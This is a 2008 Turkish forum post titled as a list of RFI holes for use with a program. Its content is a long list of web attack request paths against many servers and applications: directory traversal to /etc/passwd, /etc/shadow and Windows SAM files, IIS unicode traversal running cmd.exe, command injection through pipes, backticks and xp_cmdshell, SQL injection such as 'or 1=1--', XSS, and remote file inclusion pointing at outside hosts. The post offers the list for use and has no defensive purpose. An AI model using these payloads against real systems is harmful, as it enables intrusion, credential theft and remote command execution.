Alt 12-08-2008   #1
sanal_ceza
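Bütün RFI Açıkları Programla Çalışır

Not: Başlık yalnızca RFI'dan söz etse de aşağıdaki liste dizin geçişi (../), SQL enjeksiyonu, XSS ve varsayılan ya da hassas dosya yollarını da içeren karışık bir istek yolu listesidir; baştaki satırlar ile uzun satırların bir kısmı kopyalanırken kesilmiştir.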

/
result_type=topics& hl=&st=20_sql_things/*
MIT%201%20/*
m/search.dll?search?query=/&logic=AND
list/httplist.jse
ilTemplate1=/cgi-bin/formprocessor.asp
hru('/bin/ls')."
ert('XSS')</script>
ern ame+=+USER+--/.html
e_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
docs/CodeBrws.asp
conf,Listen 8000%0A%0DAccessLog "|../../../../../../winnt/system32/cmd.exe /c dir")
cmdshell(" cmd.exe+/c%20dir");--
c/hosts
8443:/plugins/hpjwja/script/devices_update_printer_fw_upload.hts
8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
77&os=notunixornt&per lpath=/usr/bin/perl&mailprog=/bin/sh¬ification="%20.`%2F%75%73%7
10000:/dansguardian/edit.cgi?file=xxx
1%20/*
</script
+FROM+yabbse_members+where+ID_MEMBER= 1/*
:9998/
:9495/
:9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
:9090/examples/applications/bboard/bboard_frames.html
:9090/board.html
:9090/apps/web/vs_diag.cgi?server=_XSS_
:9090//etc/shadow
:9090///
:9000/cgi-bin/query%3f
:9000/admin/reports/alertlist.mml
:8987/sawmill?rfcf+"/etc/passwd"+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
:8888/surf/scwebusers
:8888/SimpleBar.dll/RunReport
:8888/samples/view-source?filename=anotherone
:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=perceb e&re_password=perc
:8888/cgi-bin/admin/admin
:8888/admin/reports/alertlist.mml
:8888/admin.cgi
:8888/ab2/@Ab2Admin
:8888/
:8500/CFIDE/probe.cfm
:85/waadmin.wa
:8383/cd-cgi/sscd_suncourier.pl
:8383/1111/readmail.cgi?uid=user1&mbx=../test/Main
:8100//WEB-INF/webapp.properties
:8100//WEB-INF/web.xml
:8100//WEB-INF/
:81/cgi-bin/.cobalt/message/message.cgi?info=**********alert%28'XSS'%29% 3B</script>
:81/.cobalt/sysManage/../admin/.htaccess
:8099/users/user_setpassword.asp
:8099/admin/users/users.asp
:8099/admin/tasks.asp
:8099/admin/default.asp
:8089/tools/ftgatedump.fts?command=1
:8089/tools/ftgatedump.fts
:8081/admin/reports/alertlist.mml
:8081/
:8080/web-console/ServerInfo.jsp%00
:8080/web-console/
:8080/tea/dynamic/system/teaservlet/Admin?admin=true
:8080/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
:8080/samples/view-source?filename=anotherone
:8080/index.js%70
:8080/examples/servlet/TroubleShooter
:8080/examples/servlet/SnoopServlet
:8080/examples/servlet/SnoopServlet
:8080/examples/jsp/source.jsp
:8080/examples/jsp/snp/anything.snp
:8080/examples/basic/servlet/HelloServlet
:8080/anything.jsp
:8080/\../readme.txt
:8080//admin//user.pl
:8080/.jsp/WEB-INF/classes/Env.java
:8080/../ssd.ini
:8080/../examples//WEB-INF/../../../../../
:8080/../../winnt/win.ini%00examples/jsp/hello.jsp
:8080/../../../conf/Eserv.ini
:8080/%2e%2e/%2e%2e/%00.jsp
:8025/admin/reports/alertlist.mml
:8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/ac
:8010/Guide/../../../../../../../../../../../../../../../etc/shadow
:8010/d://
:8010/c://
:8010//
:8010/..../
:8010/
:801/../../../../../../../../etc/hosts
:8009/
:8003/Display
:8002/Newuser?Image=../../database/rbsserv.mdb
:8000/servlet/ssifilter/../../test.jsp
:8000/servlet/jsp/../../tst.txt
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8000/servlet/com.endymion.sake.servlet.mail.MailServlet?
:8000/file/%2E%2E/test1.mp3
:8000/cgi/wja?page=wja
:8000/admin/reports/alertlist.mml
:8000//welcome.jsp
:8000//
:8000/./WEB-INF/web.xml
:8000/./WEB-INF/
:800/C:/
:800/../..\
:80/admin/reports/alertlist.mml
:80/../../../autoexec.bat
:7464/
:7273/?dellopenmanage
:6680/user.cgi?cmd=xssthings&utoken=
:6422/iiwiznew.asp
:6422/iiaction.asp
:6346/........../windows/win.ini
:631/jobs
:631/admin/?op=%c0
:5555/diffs/foo.c@';echo%20>tst'?nav= index.html|src/|hist/foo.c
:5000/diffs/foo.c@';echo%20>tst'?nav=index.html|src/|hist/foo.c
:5000/
:444/splashAdmin.php
:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts
:444/..\..\..\..\..\autoexec.bat
:4274/../../../../../WINNT/repair/sam
:4096/../../../winnt/repair/sam._
:4080/?KerioFW
:32000/mail/readmail.html?folder=inbox&get=1&id=something
:32000/mail/admin/../settings.html.
:32000/mail/admin/../include.html.
:32000/mail/addressaction.html
:3128/status.htm
:3128/mailbox.htm
:3128/../../../conf/Eserv.ini
:3128/../../../../
:30001/SWEditServlet?station_path=Z&publication_id=2043&t emplate=../../../../../../../et
:30001/../../template/shared/indexTemplate.xml
:3000/../../hosts
:2301/Proxy/LoginResponse
:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2F bo ot.ini
:2211/servlet/SessionServlet
:2211/servlet/ServletManager?user=servlet&password=manager
:2211/se/SYS:/novonyx/suitespot/docs/sewse/misc/allfield.jse
:2211/perl/env.pl
:2211/perl/
:2211/nsn/fdir.bas:ShowVulume
:2211/nsn/env.bas
:2211/nsn/Charx230=overflow
:2211/nsn/..%5Cutil/slist.bas
:2211/nsn/..%5Cutil/dsbrowse.bas
:2211/nsn/..%5Cutil/dir.bas
:2211/lcgi/ndsobj.nlm/OP=170xA=overflow
:2211/lcgi/ndsobj.nlm/170xA=overflow
:2211/lcgi/lcgitest.nlm
:2211/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/console.log
:2200/servlet/SessionServlet
:2200/servlet/ServletManager?user=servlet&password=manager
:2200/se/SYS:/novonyx/suitespot/docs/sewse/misc/allfield.jse
:2200/perl/env.pl
:2200/nsn/fdir.bas:ShowVulume
:2200/nsn/env.bas
:2200/nsn/Charx230=overflow
:2200/nsn/..%5Cutil/slist.bas
:2200/nsn/..%5Cutil/dsbrowse.bas
:2200/nsn/..%5Cutil/dir.bas
:2200/lcgi/ndsobj.nlm/OP=170xA=overflow
:2200/lcgi/ndsobj.nlm/170xA=overflow
:2200/lcgi/lcgitest.nlm
:2200/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/console.log
:2082/login/?user=_cmd_with_pipes_and_backticks
:2002/..\..\..\..\..\..\temp\temp.class
:1500/CONF&LOG=/etc/hosts&NOIH=no&FRAMES=y
:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension
:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config
:1099/reports/superlongstringxxxaso
:10000/servers/link.cgi/1/init/edit_action.cgi?0+../../../../../../../../../etc/hosts
:10000/net/
/zorum/include.php?gorumDir=anotherhost_with_group.php
/zips/
/zipfiles/
/zip/
/zeroboard/_head.php?_zb_path=http://thehost.net/a"
/zentrack/index.php?configFile=/../../../../../etc/hosts
/zboard/mem.php
/zboard/_head.php?_zb_path=http://thehost.net/a"
/yabbse/ssi.php?sourcedir=otherhost_with_Errors_php
/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1_sql_thin gs
/yabbse/Sources/Packages.php?sourcedir=anotherhost_with_Packer.php
/yabbse/Sources/Admin.php
/yabbse/Reminder.php?searchtype=esearch&user=userA'%20or%2 0memberName='userB
/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6 d19f2;action=post;threadid=1;
/yabbse/
/yabb/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/yabb/
/xsql/java/xsql/demo/adhocsql/query.xsql?xml-stylesheet=none.xml&sql=select+*+from+sys.db
/xsql/java/demo/
/XMBforum/member.php?action=viewpro&member=admin<script&g t;alert('x')<%2fscript>
/xmbforum/member.php
/XMBforum/buddy.php?action=**********alert('x')</script>&buddy=**********al
/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=% 20f.private=-99%20GROUP%20B
/xmb/member.php?action=viewpro&member=waraxe&restrict=% 20f.private=-99%20GROUP%20BY%20p.
/xmb/member.php
/wx/s.dll?d=/bootlog.txt
/www-sql/
/wwwjoin/
/wwwboard/wwwboard.pl
/wwwboard/wwwadmin.pl
/wwwboard/wwwadmin.cgi
/wwwboard/passwd.txt
/www/
/WS_FTP.LOG
/wordpress/index.php?cat=100)%09or%090=0%09or%09(0=1
/wl_management_internal2/wl_management
/wl_management_internal2/
/wl_management?x=y
/wikihome/action/conflict.php?TemplateDir=http://my.host/
/wi/bin/
/wi/
/WebzEdit/done.jsp?message=');xss_things;a=escape('
/WebTrend/
/webstore/admin/addcustomer.php
/webstore/addcustomer.php
/webstar.log
/WebSTAR%20LOG
/website/
/WebShop/
/webres/discuss/passwd.txt
/webMathematica/MSP?MSPStoreID=../../../../../etc/hosts&MSPStoreType=image/gif
/webmail/vpopmail.php
/webmail/src/search.php
/webmail/src/read_bOdy.php
/webmail/src/compose.php?mailbox="script_stuff
/webmail/message.mdb
/webmacro/Page?db=tst&wmtemplate=ttt
/webmacro/org.paneris.paneris.controller.Page?db=tst&wmtemplate=ttt
/WEB-INF/web.xml
/WEB-INF./web.xml
/webEdition/
/WebDB/admin_/
/webdata/
/web-console/ServerInfo.jsp%00
/web-console/
/webcalendar/colors.php?color=xssthings
/webcalendar/
/webboard/
/webadmin/
/webadmin.ntf
/webadmin.nsf
/WebAdmin.dll?View=Logon_and_User_POSTVARoverflow
/WebAdmin.dll?Session=X&Program=MDaemon&Directory:N ame=C:\WINNT&File:Name= WIN.INI&View=
/web800fo/
/Web_store/
/web/usermgr/userlist.asp
/web/msgError.asp?Redirect=login.htm&Reason=thingss
/web/
/web.config
/wbboard/reply.php
/way-board/way-board.cgi?db=way-board.cgi%00
/wartung/
/w-agora/index.php
/wagora/index.php
/waadmin.wa
/vpopmail.php
/vpasp/shopsearch.asp
/vpasp/shopdisplayproducts.asp?cat=qwerty'
/viewsource.jsp
/viewpage.php?file=/etc/hosts
/view_source.jsp
/view_all_bug_page.php
/view.tmpl?testfile=filewithdirtrav
/vgn/vr/Select
/vgn/vr/Editing
/vgn/style
/vgn/ppstats
/vgn/login?errInfo="%2b%20****************%20%2b"
/vgn/legacy/save?needs_vgn_creds_Cookie
/vgn/legacy/edit
/vgn/ac/index
/vgn/ac/edit
/vbzoom/register.php
/VBZooM/download/
/VBZooM/add-subject.php?Success=1&FileName=localFile&FileName_ size=500&FileName_name=rem
/vbb/calendar.php?s=&action=edit&eventid=14_sql_injecti on_things
/variables.php3?Include=
/users/user_setpassword.asp
/Users/default.users
/users/
/users.php?DATA=phpcode&then->/news.php3
/users.asp,
/userinfo.php?uid=33;
/userdata/
/user_update.php
/user_settings.cfg
/user_info.php3?user_username=''+or+admin_level=2+o r+username%3d'x'+and+users.id= access
/user/test.txt
/user/admin.txt
/user/
/user.php?caselist[mungo.txt][path]=http://www.somehost.cc&command=/bin/ls
/usage/
/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
/upnp/service/WANPPPConnection
/upload-tmp/
/uploadtmp/
/upload-temp/
/uploadtemp/
/uploads/
/uploading/
/upload-files/
/uploadfiles/
/uploader.php
/upload-********s/
/upload-docs/
/upload2.html
/upload2.htm
/upload/uploader.php
/upload/upload.php
/upload/
/upload.php
/upload.html
/upload.asp
/updates/
/update.dpgs
/unix/ALEX/Xerver2.10/
/udataobj/webgui/cgi-bin/tuxadm.exe?INIFILE=xssthings
/ubb/register.php
/ubb/cgi-bin/postings.cgi
/typo3/quickstart/
/typo3/install/
/typo3/dev/translations.php
/typo3/
/tutos/file/file_select.php?msg=xss_code
/tutos/file/file_new.php?link_id=1065&fileupload_possible_file _in_tutos_repository_numbe
/ttforum/index.php?action=news;board=1;template=another_ser ver;ext=help
/tstsite/
/tstfiles/
/tst/psoft.hsphere.CP/tst/?template_name=x
/tst/
/tree/
/trace.axd
/TopSitesdirectory/help.php?sid=xssthings
/topsitesdirectory/edit.php?a=pre&submit=&sid=sql_injection--
/topsitesdir/edit.php?a=pre&submit=&auth=1&sid=someid
/topo/out.php?id=any_word
/topo/in.php?id=any_word
/topic/entete.php?subpath=http://badurl_banniere.php
/top/out.php?id=any_word
/top/in.php?id=any_word
/tools/ftgatedump.fts?command=1
/tools/ftgatedump.fts
/tools/
/tmp-upload/
/tmpupload/
/tmpfiles/
/tmp_view.php?file=/etc/hosts
/tmp/
/tinymsg.php?action=2&to=../../tadaam.html%00&from=youpi1&msg=youpi2
/timeline.php?pids=_sql_things
/timeline.php?pids[0]=
/ticketlogin
/ticket.php?id=545
/thread/search.asp
/thread/default.asp?orderby=Author
/thatfile.php?root_path=http://host/config.php_and_messages.1.php
/textportal/admin_pass.php
/texis.exe/?-version
/texis.exe/?-dump
/testsite/
/testfiles/
/test-cgi/
/Test11.asp
/test/
/test.php3
/test.jsp../
/test.jsp..
/test%2ejsp
/temp-upload/
/tempupload/
/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=another_h ost
/templates/form_header.php?noticemsg=jsinject
/tempfiles/
/temp/
/technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/sysuser/docmgr/ieedit.stm?url=%2e%2e%2f
/sysuser/docmgr/iecreate.stm?template=%2e%2e%2f
/system/bin/user/p0184.php
/system/bin/user/p0177.php
/system/bin/upload/p0227.php
/system/bin/upload/p0204.php
/system/bin/upload/p0199.php
/system/bin/upload/
/system/bin/page/p0190.php
/system/bin/binbackoffice/p0104.php
/system/bin/binbackoffice/
/system/bin/
/system/
/syslog.htm
/sws/admin.html
/SWEditServlet?station_path=Z&publication_id=2043&t emplate=../../../../../../../etc/host
/supporter/tupdate.php?groupid=change&sg=groupid,description= char(97,98,99,100)&id=10
/supporter/index.php?t=updateticketlog&id=without%20me
/supporter/index.php?t=editticket&id=got%20root
/supporter/index.php?t=detailticket&id=root%20me
/support/messages
/support/
/suche%3f
/subscribe.pl
/submit.php
/stronghold-status
/stronghold-info
/StoreDB/
/store/tmp/
/store/temp_customers/
/store/temp/
/store/stats.php
/store/show_cart.inc.php
/store/shopexd.asp?catalogid=sql_inject
/store/sfError.asp?sfid=20212&reason=xssscripts
/store/more.php?id='sql_things
/store/index.php?cat_id='
/store/customers/
/status/
/stats/
/stats.php
/statref.nsf
/staticpages/index.php?page=test'test/sqlinject
/stat/
/ssi/envout.bat
/ssi.php?a=out&type=xml&f=0)
/ss_admin.asp?Mode=Update&Acton=Access&UserName=pom mes&Password=frittes
/srcfiles/
/src/search.php
/src/read_bOdy.php?mailbox=scripting
/src/read_bOdy.php
/src/Profile.php
/src/options.php
/src/left_main.php
/src/
/squirrelmail/src/compose.php?mailbox="script_stuff
/sql/db_type.php?waroot=http://anotherhost_start_php/
/sql/
/SPSamp/AdvWorks/equipment/catalog_type.asp
/sources/functions.php?skinid=huhh
/source?v=../../../../../../../etc/hosts%00
/source/
/source.jsp
/soinfo.php
/software/
/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/soap/servlet/Spy
/soap/servlet/soaprouter
/snmpinit
/siteserver/publishing/viewcode.asp?source=/tata.asp
/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
/SiteServer/Admin/knowledge/dsmgr/default.asp
/SiteServer/admin/findvserver.asp?uid=LDAP_Anonymous&pwd=LdapPasswor d_1
/SiteServer/Admin/commerce/foundation/DSN.asp
/SiteServer/Admin/commerce/foundation/driver.asp
/SiteServer/Admin/commerce/foundation/domain.asp
/sitenews.cgi?edit
/siteman000510/siteman.php3
/site/page.html
/site/iissamples/
/site/eg/source.asp
/site/'+UNION+ALL+SELECT+FileToClob('/etc/hosts','server')::html,0+FROM+sysusers+WHERE+us
/sipssys/users/
/sips/sipssys/users/
/sips/htdocs/preferences.php
/sips/htdocs/admin/index.php
/singapore/data/adminusers.csv
/simplebbs/users/users.php
/signon?admin=admin&maybe_tivoli
/shtml/
/showhits.php3?rel_path=http://another/main_********.inc
/showcat.asp/
/show_cart.inc.php
/shoutbox.php?conf=../../../../../../../etc/hosts
/shopping/shopexd.asp?catalogid=sql_inject
/shopping/shopexd.asp
/shopping/shopdisplayproducts.asp?id=1&cat=xss_things
/shopper/
/shopper.exe?display=action&template= order.log
/shopexd.asp?catalogid=sql_inject
/shopexd.asp
/shop/users.asp,
/shop/stats.php
/shop/showcat.asp/
/shop/show_cart.inc.php
/shop/shopexd.asp?catalogid=sql_inject
/shop/shopexd.asp
/shop/payonline.asp
/shop/normal_html.cgi?file=|id|
/shop/normal_html.cgi?file=../../../../../../etc/hosts%00
/shop/newuser.asp
/shop/more.php?id='sql_things
/shop/member_html.cgi
/shop/gotopage.cgi?13686+/../../../../../../etc/hosts
/shop/genindexpage.cgi?13687+Home+/../../../../../../etc/hosts
/shop/details.asp
/shop/category.asp?catcode=1%20union%20all%20select%20pa ss,0,0,0,0%20from%20customers%20
/shop/cart.asp
/shop/browse.asp
/shop/
/setupweb.nsf
/setup-files/
/setup_files/
/setup/index.php?GALLERY_BASEDIR=another_host_with_util.p hp
/setup/
/setup.nsf
/setup.cgi?todo=debug
/settings/site.ini
/settings
/sessions.py
/sessions.pl
/sessions.phps
/sessions.php
/sessions.jsp
/sessions.jhtml
/sessions.aspx
/sessions.asp
/sessions
/session/pagecount?page=
/session/adminlogin?RCpage=/sysadmin/index.stm
/session/
/session.py
/session.pl
/session.phps
/session.php
/session.jsp
/session.jhtml
/session.aspx
/session.asp
/servlets/wl_management
/servlets/weblogic.management.servlet.FileDistributionServlet
/servlets/org.apache.cocoon.Cocoon
/servlets/gnujsp//
/servlets/com.sun.server.http.pagecompile.jsp92.JspServlet
/servlets/com.sun.server.http.pagecompile.jsp.runtime.JspServlet
/servlet/wl_management
/servlet/WebPopServlet?config=uii.txt
/servlet/webacc?User.id=&User.password=&User.context=cwqlNo moqdOq&User.interface=frames&
/servlet/webacc?User.html=../../../../../../../../boot.ini%00
/servlet/viewsource.jsp
/servlet/test/pathInfo/test
/servlet/SurveyXMLServlet?jeaaa.txt
/servlet/ssifilter/../../test.jsp
/servlet/Spy
/servlet/SessionServlet
/servlet/ServletManager?username=servlet&password=manager
/servlet/psoft.hsphere.CP/
/servlet/psoft.hsphere.CP
/servlet/psft.pt8.reader.ReaderServlet
/servlet/psft.pt8.gateway.GatewayServlet
/servlet/psft.pt8.config.ConfigServlet
/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/servlet/jsp/../../tst.txt
/servlet/FormMailServlet?juhu.txt
/servlet/FileDistributionServlet
/servlet/file
/servlet/DMSDump
/servlet/ContentServer?pagename=xssthings
/servlet/com.unify.ewave.servletexec.UploadServlet
/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet
/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet
/servlet/com.newatlanta.servletexec.JSPServlet/
/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5c\global.asa
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
/servlet/com.endymion.sake.servlet.mail.MailServlet?
/servlet//..//../o.jsp
/sendphoto.php?album=..&pic=config.inc.php&sendto=m ei@websec.org&filled=1
/sendphoto.php?album=..&pic=config.inc.php
/sendeditfile
/sek-bin/login.gas.bat?Template=../../../../../../../../etc/hosts&LOCALE=en_US&AUTHMETHOD
/sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale =../../config/log.conf%00%5c&
/Secure/Local/console/cmhome.htm
/secure%5Clogin.aspx
/secret/index.html
/secret/index.htm
/search97/search97.vts
/search97/s97_cgi.exe
/search?NS-query=tst&NS-query-pat=..\..\..\..\..\boot.ini
/search/search97.vts?HLNavigate=On&querytext=dcm&ServerKey =Primary&ResultTemplate=../../
/search/s97_cgi.exe
/search/s97.vts?Action=FormGen&ServerKey=Primary&Template=
/search/results.stm?query=**********alert('X');</script>
/search/results.stm
/search/iaquery.exe%3f
/search.php?search=a'%20order%20by%20time%20desc% 3b%20qry
/search.php?search=a%'%20order%20by%20time%20de sc%3b%20qry
/search.dll?search?query=%00&logic=AND
/search.asp
/search%3f
/Search
/scrivi.php
/scripts/wwwi32.exe/[in=c:\\boot.ini]
/scripts/wsm.phtml?searchboxinputname=|unixcommand
/scripts/wsisa.dll/WService=anything?WSMadmin
/scripts/wsendmail.exe
/scripts/wguest.exe
/scripts/websec.bat/ ..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\
/scripts/webplus.exe
/scripts/webnews.exe
/scripts/uploadx.asp
/scripts/uploadn.asp
/scripts/upload.exe
/scripts/upload.asp
/scripts/toos/mkilog.exe
/scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B %28*.mdb%29&dsn=Web%20S
/scripts/tools/getdrvrs.exe
/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng% 20int);EXEC+master..xp_
/scripts/texis.exe/ngohos
/scripts/texis.exe/?-version
/scripts/texis.exe/?-dump
/scripts/test.exe
/scripts/test.bat
/scripts/slxweb.dll/getfile?type=Library&file=_any_file_tata
/scripts/slxweb.dll/admin
/Scripts/SLwebmail/WebMailReq.dll?pathdisclosure
/Scripts/SLwebmail/showlogin.dll?Language=BOF
/Scripts/SLwebmail/ShowGodLog.dll?FILE=c:%5c%5cBOOT.INI
/Scripts/SLwebmail/recman.dll?CompanyID=BOF
/Scripts/SLwebmail/GlobalLogin.dll?CompanyID=BOF
/Scripts/SLwebmail/GlobalLogin.dll?CompanyID=BOF
/Scripts/SLwebmail/admin.dll?CompanyID=BOF
/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&fil e= ;ls|
/scripts/search.asp
/scripts/script.cmd%3f&dir
/scripts/script.bat%3f&dir
/scripts/samples/details.idc
/scripts/samples/ctguestb.idc
/scripts/rguest.exe
/scripts/repost.asp
/scripts/process_bug.cgi
/scripts/postie.exe
/scripts/postie.cgi
/scripts/perl.exe
/scripts/perl
/scripts/objcheck.asp
/scripts/nsiislog.dll?
/scripts/mailsend.exe
/scripts/MailPost.exe
/scripts/mailmepro.exe
/scripts/mailme.exe
/scripts/mailform.exe
/scripts/mail.cgi
/scripts/iisadmin/ism.dll%3fhttp/dir
/scripts/gnujsp//
/scripts/formvar.exe
/scripts/foo.cmd?xxx&dir
/scripts/files.pl
/scripts/emurl/RECMAN.dll?
/scripts/dbman/db.cgi?db=tedb
/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
/scripts/CWMail.exe
/scripts/cs/cssearch.cgi?command=all&setup=`/bin/ls`
/scripts/cpshost.dll?my_file=localthing&TargetURL=/Sites/Publishing/srvname/ldap_anonymou
/scripts/cphost.dll?my_file=localthing&TargetURL=/Sites/Publishing/srvname/ldap_anonymous
/scripts/convert.bas
/scripts/cgimail.exe
/scripts/cgi-bin/upload.exe
/scripts/cart32.exe/GetLatestBuilds?cart32=xssthings
/scripts/cart32.exe/cart32clientlist?passwd=wemilo
/scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:\..\winnt\sy stem32\cmd.exe%20/c%2
/scripts/Carello/Carello.dll?CARELLOCODE=postthing&VBEXE=thisisit
/scripts/Carello/Carello.dll
/scripts/Carello/add.exe
/scripts/c32web.exe/ChangeAdminPassword
/scripts/blat.exe
/scripts/bigconf.cgi
/scripts/bdir.htr
/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/*.pl
/scripts
/scozbook/view.php?PG=notexisting
/scozbook/add.php
/sbin/nscgi.cfg
/sbin/
/samples/view-source?filename=anotherone
/samples/Search/queryhit.htm
/sales/
/s97is.vts?action=View&VdkVgwKey=%2Fetc%2fhosts&doc type=raw&Collection=
/s8forumfolder/users/any_name.php?cmd=uname%20-a_mail_cmd_etc
/runfile
/run/forma
/run.cgi
/Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/rpc.cgi
/root/
/room/save_item.php?name=wollo&ref=josef&photo=../inc/conf.php&photo_type=txt
/room/index.php?show=search&search=it_name&item=wollo
/robots.txt
/ROADS/cgi-bin/search.pl?form=search.pl%00
/retail/
/resend.asp?ID=sql_things
/reseller/
/reports/temp/
/remote_login.pl%20
/registry/AWSguest.php
/registered/
/register/
/rbdforum-standalone/login.asp
/rbdforum/login.asp
/random_banner/index.cgi?image_list=alternative_image.list&html_f ile=|ls%20-la|
/random_banner/index.cgi?image_list=alternative_image.list&html_f ile=../../../../../etc/
/quote.html?filename=../../../../../../../../../../../../../../../../etc/hosts&path_to_fo
/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts
/quikstore.cfg
/quickstart/util/srcview.aspx?path=./&file=srcview.aspx&font=3
/quickstart/
/question/crm/download.php?filename=../../../../../../../../../../../../etc/hosts
/qshop/admin/upload.htm
/qshop/admin/
/pw/storemgr.pw
/pw/
/pvote/ch_info.php
/purchases/
/purchase/
/publisher/
/public/exec/MsmSetup.exe?tst
/public/
/pub/
/ptsite/news.inc
/psynch/nph-psf.exe?lang=
/psynch/nph-psf.exe?css=">_some_XSS
/psynch/nph-psa.exe?lang=
/psynch/nph-psa.exe?css=site_with_file
/psynch/nph-psa.exe?css=">_some_XSS
/psynch/nph-psf.exe?css=site_with_file
/PSUser/PSCOErrPage.htm?errPagePath=/etc/hosts
/pservlet.html
/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20' '='
/proplus/admin/login.php?action=insert&username=test&password=tes t
/prometheus-all/index.php?PROMETHEUS_LIBRARY_BASE=
/Program%20Files/BadBlue/PE/ext.ini
/profiles.php?uid=scriptthings
/profile.php?mode=viewprofile&u='sql_injection
/profile.php
/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
/ProductCart/pc/msg.asp?message=xssthings
/productcart/pc/Custvb.asp?redirectUrl=&Email='+having+1%3D1--&_email=email&password=asd&
/produccart/pcadmin/login.asp?idadmin='+or+1=1--+
/privmsg.php
/private/
/priv/
/ppwb/Temp/
/powerslave,id,10;,nodeid,,_language,uk.html
/postgresql/
/postgres/
/poster/mem.php
/postbug.php
/post_message_form.asp?mode=quote&PID=1111&FID=1&TI D=11&TPN=1
/portal/diag/
/portal/administration/userman.php
/PoolMan.jsp
/poll/textfile/info.php
/poll/db/info.php
/pm/lib.inc.php?pm_path=anothewrhost_with_config.txt&s fx=.txt
/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%20hello&sqspell_us
/plugins/hpjwja/script/devices_update_printer_fw_upload.hts
/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
/plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.
/plugins/3fax/1blocklists/index.php?plugin=anotherserver_with_things
/plugins/2administration/6departamentadmin/index.php
/plugins/2administration/5terminals/index.php
/plugins/2administration/4mailinglists/index.php
/plugins/2administration/3departaments/index.php
/plugins/2administration/2groupd/index.php
/pls/orasso/orasso.wwsso_app_admin.ls_login
/pls/orasso/
/pls/demo/owa_util.signature
/pls/demo/owa_util.showsource?cname=owa_util
/pls/demo/owa_util.show_query_columns?ctable=sys.dba_users
/pls/demo/owa_util.listprint?p_theQuery=select+*+from+sys.db a_users&p_cname=&p_nsize=
/pls/demo/owa_util.cellsprint?p_theQuery=select+*+from+sys.d ba_users&p_max_rows=10
/pls/demo/%20owa_util.signature
/pls/demo/%0aowa_util.signature
/pls/demo/%08owa_util.signature
/pls/admin_/help/..%5Cplsql.conf
/pls/admin_/?
/placelist.php?level=2&parent[0]=&parent[1]=_sql_things
/placelist.php?level=1_sql_things
/placelist.php?level=1&parent[Blah]=
/placelist.php?level=1&parent[0]=_sql_things
/piranha/secure/passwd.php3?username=piranha&passwd=q
/ping
/pi_admin.admin
/phpwebfilemgr/index.php?f=../../../
/phptonuke.php?filnavn=/etc/hosts
/phprocketaddin/?page=../../../../../../../etc/hosts
/phprank/update.php?page=update&name=zok&description=zok&si teurl=zok&banurl=zok&bh=42&bw
/phpprojekt/
